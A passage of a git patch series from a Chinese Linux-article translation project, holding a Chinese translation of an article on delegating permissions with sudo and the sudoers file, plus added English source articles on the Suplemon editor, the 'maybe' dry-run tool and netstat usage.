权限。 那么该用户可以以 ruser 的身份登陆,然后通过以下命令运行 myprog。 -``` - sudo myprog +```shell +sudo myprog ``` -I find it helpful to have the log of each command run by sudo for training. I can see who did what and whether they entered the command correctly. +我发现在训练时记录下每个用 sudo 执行的命令会很有帮助。我可以看到谁执行了哪些命令,他们是否输对了。 -I have done this to delegate authority to myself and one other user to run a single program; however, sudo can be used to do so much more. It can allow the sysadmin to delegate authority for managing network functions or specific services to a single person or to a group of trusted users. It allows these functions to be delegated while protecting the security of the root password. +我委派了权限给自己和另一个人来运行那个程序; 然而,sudo 可以做更多的事情。 它允许系统管理员委派网络管理或特定的服务器权限给某个人或某组人,以此来保护 root 密码的安全性。 -### Configuring the sudoers file +### 配置 sudoers 文件 -As a sysadmin, I can use the /etc/sudoers file to allow users or groups of users access to a single command, defined groups of commands, or all commands. This flexibility is key to both the power and the simplicity of using sudo for delegation. +作为一名系统管理员,我使用 `/etc/sudoers` 文件来设置某些用户或某些用户组可以访问某个命令,或某组命令,或所有命令。 这种灵活性是使用 sudo 进行委派时能兼顾功能与简易性的关键。 -I found the sudoers file very confusing at first, so below I have copied and deconstructed the entire sudoers file from the host on which I am using it. Hopefully it won't be quite so obscure for you by the time you get through this analysis. Incidentally, I've found that the default configuration files in Red Hat-based distributions tend to have lots of comments and examples to provide guidance, which makes things easier, with less online searching required. +我一开始对 `sudoers` 文件感到很困惑,因此下面我会拷贝并分解我所使用主机上的完整 `sudoers` 文件。 希望在分析的过程中不会让你感到困惑。 我意外地发现, 基于 Red Hat 的发行版中默认的配置文件都会很多注释以及例子来指导你如何做出修改,这使得修改配置文件变得简单了很多,也不需要在互联网上搜索那么多东西了。 -Do not use your standard editor to modify the sudoers file. Use the visudo command because it is designed to enable any changes as soon as the file is saved and you exit the editor. It is possible to use editors besides Vi in the same way as visudo. +不要直接用编辑起来修改 sudoers 文件,而应该用 `visudo` 命令,因为该命令会在你保存并退出编辑器后就立即生效这些变更。 visudo 也可以使用除了 `Vi` 之外的其他编辑器。 -Let's start analyzing this file at the beginning with a couple types of aliases. +让我们首先来分析一下文件中的各种别名。 -### Host aliases +#### Host aliases(主机别名) -The host aliases section is used to create groups of hosts on which commands or command aliases can be used to provide access. The basic idea is that this single file will be maintained for all hosts in an organization and copied to /etc of each host. Some hosts, such as servers, can thus be configured as a group to give some users access to specific commands, such as the ability to start and stop services like HTTPD, DNS, and networking; to mount filesystems; and so on. +host aliases 用于创建主机分组,在不同主机上可以设置允许访问不同的命令或命令别名 (command aliases)。 它的基本思想是,该文件由组织中的所有主机共同维护,然后拷贝到每台主机中的 `/etc` 中。 其中有些主机, 例如各种服务器, 可以配置成一个组来赋予用户访问特定命令的权限, 比如可以启停类似 HTTPD, DNS, 以及网络服务; 可以挂载文件系统等等。 -IP addresses can be used instead of host names in the host aliases. +在设置主机别名时也可以用 IP 地址替代主机名。 ``` ## Sudoers allows particular users to run various commands as -## the root user, without needing the root password. +## the root user,without needing the root password。 ## ## Examples are provided at the bottom of the file for collections -## of related commands, which can then be delegated out to particular -## users or groups. +## of related commands,which can then be delegated out to particular +## users or groups。 ## -## This file must be edited with the 'visudo' command. +## This file must be edited with the 'visudo' command。 ## Host Aliases -## Groups of machines. You may prefer to use hostnames (perhaps using -## wildcards for entire domains) or IP addresses instead. -# Host_Alias FILESERVERS = fs1, fs2 -# Host_Alias MAILSERVERS = smtp, smtp2 +## Groups of machines。You may prefer to use hostnames (perhaps using +## wildcards for entire domains) or IP addresses instead。 +# Host_Alias FILESERVERS = fs1,fs2 +# Host_Alias MAILSERVERS = smtp,smtp2 ## User Aliases -## These aren't often necessary, as you can use regular groups -## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname +## These aren't often necessary,as you can use regular groups +## (ie,from files, LDAP, NIS, etc) in this file - just use %groupname ## rather than USERALIAS -# User_Alias ADMINS = jsmith, mikem -User_Alias AUDIO = dboth, ruser +# User_Alias ADMINS = jsmith,mikem +User_Alias AUDIO = dboth,ruser ## Command Aliases -## These are groups of related commands... +## These are groups of related commands。.。 ## Networking -# Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, - /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, -/usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool +# Cmnd_Alias NETWORKING = /sbin/route,/sbin/ifconfig, + /bin/ping,/sbin/dhclient, /usr/bin/net, /sbin/iptables, +/usr/bin/rfcomm,/usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool ## Installation and management of software -# Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum +# Cmnd_Alias SOFTWARE = /bin/rpm,/usr/bin/up2date, /usr/bin/yum ## Services -# Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig +# Cmnd_Alias SERVICES = /sbin/service,/sbin/chkconfig ## Updating the locate database # Cmnd_Alias LOCATE = /usr/bin/updatedb ## Storage -# Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount +# Cmnd_Alias STORAGE = /sbin/fdisk,/sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount ## Delegating permissions -# Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp +# Cmnd_Alias DELEGATING = /usr/sbin/visudo,/bin/chown, /bin/chmod, /bin/chgrp ## Processes -# Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall +# Cmnd_Alias PROCESSES = /bin/nice,/bin/kill, /usr/bin/kill, /usr/bin/killall ## Drivers # Cmnd_Alias DRIVERS = /sbin/modprobe @@ -94,9 +93,9 @@ User_Alias AUDIO = dboth, ruser # Defaults specification # -# Refuse to run if unable to disable echo on the tty. +# Refuse to run if unable to disable echo on the tty。 # -Defaults !visiblepw +Defaults!visiblepw Defaults env_reset Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS" @@ -109,19 +108,19 @@ Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin ## Next comes the main part: which users can run what software on ## which machines (the sudoers file can be shared between multiple -## systems). +## systems)。 ## Syntax: ## ## user MACHINE=COMMANDS ## -## The COMMANDS section may have other options added to it. +## The COMMANDS section may have other options added to it。 ## ## Allow root to run any commands anywhere root ALL=(ALL) ALL -## Allows members of the 'sys' group to run networking, software, -## service management apps and more. -# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS +## Allows members of the 'sys' group to run networking,software, +## service management apps and more。 +# %sys ALL = NETWORKING,SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS ## Allows people in group wheel to run all commands %wheel ALL=(ALL) ALL @@ -131,7 +130,7 @@ root ALL=(ALL) ALL ## Allows members of the users group to mount and unmount the ## cdrom as root -# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom +# %users ALL=/sbin/mount /mnt/cdrom,/sbin/umount /mnt/cdrom ## Allows members of the users group to shutdown this system # %users localhost=/sbin/shutdown -h now @@ -140,81 +139,82 @@ root ALL=(ALL) ALL #includedir /etc/sudoers.d ################################################################################ -# Added by David Both, 11/04/2017 to provide limited access to myprog # +# Added by David Both,11/04/2017 to provide limited access to myprog # ################################################################################ # AUDIO guest1=/usr/local/bin/myprog ``` -### User aliases +#### User aliases(用户别名) -The user alias configuration allows root to sort users into aliased groups so that an entire group can have access to certain root capabilities. This is the section to which I have added the line User_Alias AUDIO = dboth, ruser, which defines the alias AUDIO and assigns two users to that alias. +user alias 允许 root 将用户整理成组并按组来分配权限。在这部分内容中我加了一行 `User_Alias AUDIO = dboth, ruser`,他定义了一个别名 `AUDIO` 用来指代了两个用户。 -It is possible, as stated in the sudoers file, to simply use groups defined in the /etc/groups file instead of aliases. If you already have a group defined there that meets your needs, such as "audio," use that group name preceded by a % sign like so: %audio when assigning commands that will be made available to groups later in the sudoers file. +正如 `sudoers` 文件中所阐明的,也可以直接使用 `/etc/groups` 中定义的组而不用自己设置别名。 如果你定义好的组(假设组名为 "audio")已经能满足要求了, 那么在后面分配命令时只需要在组名前加上 `%` 号,像这样: %audio。 -### Command aliases +#### Command aliases(命令别名) -Further down in the sudoers file is a command aliases section. These aliases are lists of related commands, such as networking commands or commands required to install updates or new RPM packages. These aliases allow the sysadmin to easily permit access to groups of commands. +再后面是 command aliases 部分。这些别名表示的是一系列相关的命令, 比如网络相关命令,或者 RPM 包管理命令。 这些别名允许系统管理员方便地为一组命令分配权限。 -A number of aliases are already set up in this section that make it easy to delegate access to specific types of commands. +该部分内容已经设置好了许多别名,这使得分配权限给某类命令变得方便很多。 -### Environment defaults +#### Environment defaults(环境默认值) -The next section sets some default environment variables. The item that is most interesting in this section is the !visiblepw line, which prevents sudo from running if the user environment is set to show the password. This is a security precaution that should not be overridden. +下部分内容设置默认的环境变量。这部分最值得关注的是 `!visiblepw` 这一行, 它表示当用户环境设置成显示密码时禁止 `sudo` 的运行。 这个安全措施不应该被修改掉。 -### Command section +#### Command section(命令部分) -The command section is the main part of the sudoers file. Everything you need to do can be done without all the aliases by adding enough entries here. The aliases just make it a whole lot easier. +command 部分是 `sudoers` 文件的主体。不使用别名并不会影响你完成要实现 的效果。 它只是让整个配置工作大幅简化而已。 -This section uses the aliases you've already defined to tell sudo who can do what on which hosts. The examples are self-explanatory once you understand the syntax in this section. Let's look at the syntax that we find in the command section. +这部分使用之前定义的别名来告诉 `sudo` 哪些人可以在哪些机器上执行哪些操作。一旦你理解了这部分内容的语法,你会发现这些例子都非常的直观。 下面我们来看看它的语法。 ``` ruser ALL=(ALL) ALL ``` -This is a generic entry for our user, ruser. The first ALL in the line indicates that this rule applies on all hosts. The second ALL allows ruser to run commands as any other user. By default, commands are run as root user, but ruser can specify on the sudo command line that a program be run as any other user. The last ALL means that ruser can run all commands without restriction. This would effectively make ruser root. +这是一条为用户 ruser 做出的配置。行中第一个 `ALL` 表示该条规则在所有主机上生效。 第二个 `ALL` 允许 ruser 以其他用户的身份运行命令。 默认情况下, 命令以 root 用户的身份运行, 但 ruser 可以在 sudo 命令行指定程序以其他用户的身份运行。 最后这个 ALL 表示 ruser 可以运行所有命令而不受限制。 这让 ruser 实际上就变成了 root。 -Note that there is an entry for root, as shown below. This allows root to have all-encompassing access to all commands on all hosts. +注意到下面还有一条针对 root 的配置。这允许 root 能通过 sudo 在任何主机上运行任何命令。 ``` root ALL=(ALL) ALL ``` -To try this out, I commented out the line and, as root, tried to run chown without sudo. That did work—much to my surprise. Then I used sudo chown and that failed with the message, "Root is not in the sudoers file. This incident will be reported." This means that root can run everything as root, but nothing when using the sudo command. This would prevent root from running commands as other users via the sudo command, but root has plenty of ways around that restriction. +为了实验一下效果,我注释掉了这行, 然后以 root 的身份, 试着直接运行 chown。 出乎意料的是这样是能成功的。 然后我试了下 sudo chown,结果失败了,提示信息 "Root is not in the sudoers file。 This incident will be reported"。 也就是说 root 可以直接运行任何命令, 但当加上 sudo 时则不行。 这会阻止 root 像其他用户一样使用 sudo 命令来运行其他命令, 但是 root 有太多中方法可以绕过这个约束了。 -The code below is the one I added to control access to myprog. It specifies that users who are listed in the AUDIO group, as defined near the top of the sudoers file, have access to only one program, myprog, on one host, guest1. +下面这行是我新增来控制访问 myprog 的。它指定了只有上面定义的 AUDIO 组中的用户才能在 guest1 这台主机上使用 myprog 这个命令。 ``` AUDIO guest1=/usr/local/bin/myprog ``` -Note that the syntax of the line above specifies only the host on which this access is to be allowed and the program. It does not specify that the user may run the program as any other user. +注意,上面这一行只指定了允许访问的主机名和程序, 而没有说用户可以以其他用户的身份来运行该程序。 -### Bypassing passwords +#### 省略密码 -You can also use NOPASSWORD to allow the users specified in the group AUDIO to run myprog without the need for entering their passwords. Here's how: +你也可以通过 NOPASSWORD 来让 AUDIO 组中的用户无需密码就能运行 myprog。像这样 Here's how: ``` AUDIO guest1=NOPASSWORD : /usr/local/bin/myprog ``` -I did not do this for my program, because I believe that users with sudo access must stop and think about what they are doing, and this may help a bit with that. I used the entry for my little program as an example. +我并没有这样做,因为哦我觉得使用 sudo 的用户必须要停下来想清楚他们正在做的事情,这对他们有好处。 我这里只是举个例子。 -### wheel +#### wheel -The wheel specification in the command section of the sudoers file, as shown below, allows all users in the "wheel" group to run all commands on any host. The wheel group is defined in the /etc/group file, and users must be added to the group there for this to work. The % sign preceding the group name means that sudo should look for that group in the /etc/group file. +`sudoers` 文件中命令部分的 `wheel` 说明(如下所示)允许所有在 "wheel" 组中的用户在任何机器上运行任何命令。wheel 组在 `/etc/group` 文件中定义, 用户必须加入该组后才能工作。 组名前面的 % 符号表示 sudo 应该去 `/etc/group` 文件中查找该组。 ``` %wheel ALL = (ALL) ALL ``` -This is a good way to delegate full root access to multiple users without providing the root password. Just adding a user to the wheel group gives them access to full root powers. It also provides a means to monitor their activities via the log entries created by sudo. Some distributions, such as Ubuntu, add users' IDs to the wheel group in /etc/group, which allows them to use the sudo command for all privileged commands. +这种方法很好的实现了为多个用户赋予完全的 root 权限而不用提供 root 密码。只需要把哦嗯虎加入 wheel 组中就能给他们提供完整的 root 的能力。 它也提供了一个种通过 sudo 创建的日志来监控他们行为的途径。 有些 Linux 发行版, 比如 Ubuntu, 会自动将用户的 ID 加入 `/etc/group` 中的 wheel 组中, 这使得他们能够用 sudo 命令运行所有的特权命令。 -### Final thoughts +### 结语 -I have used sudo here for a very limited objective—providing one or two users with access to a single command. I accomplished this with two lines (if you ignore my own comments). Delegating authority to perform certain tasks to users who do not have root access is simple and can save you, as a sysadmin, a good deal of time. It also generates log entries that can help detect problems. +我这里只是小试了一把 sudo — 我只是给一到两个用户以 root 权限运行单个命令的权限。完成这些只添加了两行配置(不考虑注释)。 将某项任务的权限委派给其他非 root 用户非常简单,而且可以节省你大量的时间。 同时它还会产生日志来帮你发现问题。 + +`sudoers` 文件还有许多其他的配置和能力。查看 sudo 和 sudoers 的 man 手册可以深入了解详细信息。 -The sudoers file offers a plethora of capabilities and options for configuration. Check the man files for sudo and sudoers for the down-and-dirty details. -------------------------------------------------------------------------------- From f48e6defcc1040148bf099b5ffe986f08c029e52 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 16:00:20 +0800 Subject: [PATCH 0382/1627] move to translated --- .../tech/20171205 Using sudo to delegate permissions in Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171205 Using sudo to delegate permissions in Linux.md (100%) diff --git a/sources/tech/20171205 Using sudo to delegate permissions in Linux.md b/translated/tech/20171205 Using sudo to delegate permissions in Linux.md similarity index 100% rename from sources/tech/20171205 Using sudo to delegate permissions in Linux.md rename to translated/tech/20171205 Using sudo to delegate permissions in Linux.md From 2a75d325e3a725248eabf27f2d78f5512e399cd6 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 16:12:11 +0800 Subject: [PATCH 0383/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Suplemon=20-=20?= =?UTF-8?q?Modern=20CLI=20Text=20Editor=20with=20Multi=20Cursor=20Support?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...I Text Editor with Multi Cursor Support.md | 151 ++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md diff --git a/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md b/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md new file mode 100644 index 0000000000..2b82be93ba --- /dev/null +++ b/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md @@ -0,0 +1,151 @@ +Suplemon - Modern CLI Text Editor with Multi Cursor Support +====== +Suplemon is a modern text editor for CLI that emulates the multi cursor behavior and other features of [Sublime Text][1]. It's lightweight and really easy to use, just as Nano is. + +One of the benefits of using a CLI editor is that you can use it whether the Linux distribution that you're using has a GUI or not. This type of text editors also stands out as being simple, fast and powerful. + +You can find useful information and the source code in the [official repository][2]. + +### Features + +These are some of its interesting features: + +* Multi cursor support + +* Undo / Redo + +* Copy and Paste, with multi line support + +* Mouse support + +* Extensions + +* Find, find all, find next + +* Syntax highlighting + +* Autocomplete + +* Custom keyboard shortcuts + +### Installation + +First, make sure you have the latest version of python3 and pip3 installed. + +Then type in a terminal: + +``` +$ sudo pip3 install suplemon +``` + +Create a new file in the current directory + +Open a terminal and type: + +``` +$ suplemon +``` + +![suplemon new file](https://linoxide.com/wp-content/uploads/2017/11/suplemon-new-file.png) + +Open one or multiple files + +Open a terminal and type: + +``` +$ suplemon ... +``` + +``` +$ suplemon example1.c example2.c +``` + +Main configuration + +You can find the configuration file at ~/.config/suplemon/suplemon-config.json. + +Editing this file is easy, you just have to enter command mode (once you are inside suplemon) and run the config command. You can view the default configuration by running config defaults. + +Keymap configuration + +I'll show you the default key mappings for suplemon. If you want to edit them, just run keymap command. Run keymap default to view the default keymap file. + +* Exit: Ctrl + Q + +* Copy line(s) to buffer: Ctrl + C + +* Cut line(s) to buffer: Ctrl + X + +* Insert buffer: Ctrl + V + +* Duplicate line: Ctrl + K + +* Goto: Ctrl + G. You can go to a line or to a file (just type the beginning of a file name). Also, it is possible to type something like 'exam:50' to go to the line 50 of the file example.c at line 50. + +* Search for string or regular expression: Ctrl + F + +* Search next: Ctrl + D + +* Trim whitespace: Ctrl + T + +* Add new cursor in arrow direction: Alt + Arrow key + +* Jump to previous or next word or line: Ctrl + Left / Right + +* Revert to single cursor / Cancel input prompt: Esc + +* Move line(s) up / down: Page Up / Page Down + +* Save file: Ctrl + S + +* Save file with new name: F1 + +* Reload current file: F2 + +* Open file: Ctrl + O + +* Close file: Ctrl + W + +* Switch to next/previous file: Ctrl + Page Up / Ctrl + Page Down + +* Run a command: Ctrl + E + +* Undo: Ctrl + Z + +* Redo: Ctrl + Y + +* Toggle visible whitespace: F7 + +* Toggle mouse mode: F8 + +* Toggle line numbers: F9 + +* Toggle Full screen: F11 + +Mouse shortcuts + +* Set cursor at pointer position: Left Click + +* Add a cursor at pointer position: Right Click + +* Scroll vertically: Scroll Wheel Up / Down + +### Wrapping up + +After trying Suplemon for some time, I have changed my opinion about CLI text editors. I had tried Nano before, and yes, I liked its simplicity, but its modern-feature lack made it non-practical for my everyday use. + +This tool has the best of both CLI and GUI worlds... Simplicity and feature-richness! So I suggest you give it a try, and write your thoughts in the comments :-) + +-------------------------------------------------------------------------------- + +via: https://linoxide.com/tools/suplemon-cli-text-editor-multi-cursor/ + +作者:[Ivo Ursino][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linoxide.com/author/ursinov/ +[1]:https://linoxide.com/tools/install-sublime-text-editor-linux/ +[2]:https://github.com/richrd/suplemon/ From b9e0afd5b4a9f60575a442f5c179faa1f77c9655 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 16:17:49 +0800 Subject: [PATCH 0384/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Know?= =?UTF-8?q?=20What=20A=20Command=20Or=20Program=20Will=20Exactly=20Do=20Be?= =?UTF-8?q?fore=20Executing=20It?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ram Will Exactly Do Before Executing It.md | 143 ++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md diff --git a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md new file mode 100644 index 0000000000..417be5b294 --- /dev/null +++ b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md @@ -0,0 +1,143 @@ +How To Know What A Command Or Program Will Exactly Do Before Executing It +====== +Ever wondered what a Unix command will do before executing it? Not everyone knows what a particular command or program will do. Of course, you can check it with [Explainshell][2]. You need to copy/paste the command in Explainshell website and it let you know what each part of a Linux command does. However, it is not necessary. Now, we can easily know what a command or program will exactly do before executing it, right from the Terminal. Say hello to “maybe”, a simple tool that allows you to run a command and see what it does to your files without actually doing it! After reviewing the output listed, you can then decide whether you really want to run it or not. + +#### How “maybe” works? + +According to the developer, + +> “maybe” runs processes under the control of ptrace with the help of python-ptrace library. When it intercepts a system call that is about to make changes to the file system, it logs that call, and then modifies CPU registers to both redirect the call to an invalid syscall ID (effectively turning it into a no-op) and set the return value of that no-op call to one indicating success of the original call. As a result, the process believes that everything it is trying to do is actually happening, when in reality nothing is. + +Warning: You should be very very careful when using this utility in a production system or in any systems you care about. It can still do serious damages, because it will block only a handful of syscalls. + +#### Installing “maybe” + +Make sure you have installed pip in your Linux system. If not, install it as shown below depending upon the distribution you use. + +On Arch Linux and its derivatives like Antergos, Manjaro Linux, install pip using the following command: + +``` +sudo pacman -S python-pip +``` + +On RHEL, CentOS: + +``` +sudo yum install epel-release +``` + +``` +sudo yum install python-pip +``` + +On Fedora: + +``` +sudo dnf install epel-release +``` + +``` +sudo dnf install python-pip +``` + +On Debian, Ubuntu, Linux Mint: + +``` +sudo apt-get install python-pip +``` + +On SUSE, openSUSE: + +``` +sudo zypper install python-pip +``` + +Once pip installed, run the following command to install “maybe”. + +``` +sudo pip install maybe +``` + +#### Know What A Command Or Program Will Exactly Do Before Executing It + +Usage is absolutely easy! Just add “maybe” in front of a command that you want to execute. + +Allow me to show you an example. + +``` +$ maybe rm -r ostechnix/ +``` + +As you can see, I am going to delete a folder called “ostechnix” from my system. Here is the sample output. + +``` +maybe has prevented rm -r ostechnix/ from performing 5 file system operations: + + delete /home/sk/inboxer-0.4.0-x86_64.AppImage + delete /home/sk/Docker.pdf + delete /home/sk/Idhayathai Oru Nodi.mp3 + delete /home/sk/dThmLbB334_1398236878432.jpg + delete /home/sk/ostechnix + +Do you want to rerun rm -r ostechnix/ and permit these operations? [y/N] y +``` + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png)][3] + +The “maybe” tool performs 5 file system operations and shows me what this command (rm -r ostechnix/) will exactly do. Now I can decide whether I should perform this operation or not. Cool, yeah? Indeed! + +Here is another example. I am going to install [Inboxer][4] desktop client for Gmail. This is what I got. + +``` +$ maybe ./inboxer-0.4.0-x86_64.AppImage +fuse: bad mount point `/tmp/.mount_inboxemDzuGV': No such file or directory +squashfuse 0.1.100 (c) 2012 Dave Vasilevsky + +Usage: /home/sk/Downloads/inboxer-0.4.0-x86_64.AppImage [options] ARCHIVE MOUNTPOINT + +FUSE options: + -d -o debug enable debug output (implies -f) + -f foreground operation + -s disable multi-threaded operation + +open dir error: No such file or directory +maybe has prevented ./inboxer-0.4.0-x86_64.AppImage from performing 1 file system operations: + +create directory /tmp/.mount_inboxemDzuGV + +Do you want to rerun ./inboxer-0.4.0-x86_64.AppImage and permit these operations? [y/N] +``` + +If it not detects any file system operations, then it will simply display a result something like below. + +For instance, I run this command to update my Arch Linux. + +``` +$ maybe sudo pacman -Syu +sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges? +maybe has not detected any file system operations from sudo pacman -Syu. +``` + +See? It didn’t detect any file system operations, so there were no warnings. This is absolutely brilliant and exactly what I was looking for. From now on, I can easily know what a command or a program will do even before executing it. I hope this will be useful to you too. More good stuffs to come. Stay tuned! + +Cheers! + +Resource: + +* [“maybe” GitHub page][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/know-command-program-will-exactly-executing/ + +作者:[SK][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://github.com/p-e-w/maybe +[2]:https://www.ostechnix.com/explainshell-find-part-linux-command/ +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png +[4]:https://www.ostechnix.com/inboxer-unofficial-google-inbox-desktop-client/ From 512ed82739b4a794f83043a20bdd314f157b1e7d Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 16:25:33 +0800 Subject: [PATCH 0385/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20NETSTAT=20Comma?= =?UTF-8?q?nd:=20Learn=20to=20use=20netstat=20with=20examples?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...mand Learn to use netstat with examples.md | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md diff --git a/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md b/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md new file mode 100644 index 0000000000..1f3b8976b1 --- /dev/null +++ b/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md @@ -0,0 +1,112 @@ +translating by lujun9972 +NETSTAT Command: Learn to use netstat with examples +====== +Netstat is a command line utility that tells us about all the tcp/udp/unix socket connections on our system. It provides list of all connections that are currently established or are in waiting state. This tool is extremely useful in identifying the port numbers on which an application is working and we can also make sure if an application is working or not on the port it is supposed to work. + +Netstat command also displays various other network related information such as routing tables, interface statistics, masquerade connections, multicast memberships etc., + +In this tutorial, we will learn about Netstat with examples. + +(Recommended Read: [Learn to use CURL command with examples][1] ) + +Netstat with examples +============================================================ + +### 1- Checking all connections + +To list out all the connections on a system, we can use ‘a’ option with netstat command, + +$ netstat -a + +This will produce all tcp, udp & unix connections from the system. + +### 2- Checking all tcp or udp or unix socket connections + +To list only the tcp connections our system, use ‘t’ options with netstat, + +$ netstat -at + +Similarly to list out only the udp connections on our system, we can use ‘u’ option with netstat, + +$ netstat -au + +To only list out Unix socket connections, we can use ‘x’ options, + +$ netstat -ax + +### 3- List process id/Process Name with + +To get list of all connections along with PID or process name, we can use ‘p’ option & it can be used in combination with any other netstat option, + +$ netstat -ap + +### 4- List only port number & not the name + +To speed up our output, we can use ‘n’ option as it will perform any reverse lookup & produce output with only numbers. Since no lookup is performed, our output will much faster. + +$ netstat -an + +### 5- Print only listening ports + +To print only the listening ports , we will use ‘l’ option with netstat. It will not be used with ‘a’ as it prints all ports, + +$ netstat -l + +### 6- Print network stats + +To print network statistics of each protocol like packet received or transmitted, we can use ‘s’ options with netstat, + +$ netstat -s + +### 7- Print interfaces stats + +To display only the statistics on network interfaces, use ‘I’ option, + +$ netstat -i + +### 8-Display multicast group information + +With option ‘g’ , we can print the multicast group information for IPV4 & IPV6, + +$ netstat -g + +### 9- Display the network routing information + +To print the network routing information, use ‘r’ option, + +$ netstat -r + +### 10- Continuous output + +To get continuous output of netstat, use ‘c’ option + +$ netstat -c + +### 11- Filtering a single port + +To filter a single port connections, we can combine ‘grep’ command with netstat, + +$ netstat -anp | grep 3306 + +### 12- Count number of connections + +To count the number of connections from port, we can further add ‘wc’ command with netstat & grep command, + +$ netstat -anp | grep 3306 | wc -l + +This will print the number of connections for the port mysql port i.e. 3306. + +This was our brief tutorial on Netstat with examples, hope it was informative enough. If you have any query or suggestion, please mention it in the comment box below. + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/learn-use-netstat-with-examples/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/learn-use-curl-command-examples/ From 01e5f3c72ac28a29ddd55716eba723a58e9ef48f Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 18:28:36 +0800 Subject: [PATCH 0386/1627] translating by lujun9972 --- ...0171205 NETSTAT Command Learn to use netstat with examples.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md b/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md index 1f3b8976b1..4001ab5c08 100644 --- a/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md +++ b/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md @@ -1,4 +1,5 @@ translating by lujun9972 +translating by lujun9972 NETSTAT Command: Learn to use netstat with examples ====== Netstat is a command line utility that tells us about all the tcp/udp/unix socket connections on our system. It provides list of all connections that are currently established or are in waiting state. This tool is extremely useful in identifying the port numbers on which an application is working and we can also make sure if an application is working or not on the port it is supposed to work. From 28d7268898251b27cfa2db99875ad3fde8f12e00 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Thu, 7 Dec 2017 19:38:02 +0800 Subject: [PATCH 0387/1627] =?UTF-8?q?=E9=80=89=E9=A2=98=20How=20to=20use?= =?UTF-8?q?=20cron=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171207 How to use cron in Linux.md | 288 ++++++++++++++++++ 1 file changed, 288 insertions(+) create mode 100644 sources/tech/20171207 How to use cron in Linux.md diff --git a/sources/tech/20171207 How to use cron in Linux.md b/sources/tech/20171207 How to use cron in Linux.md new file mode 100644 index 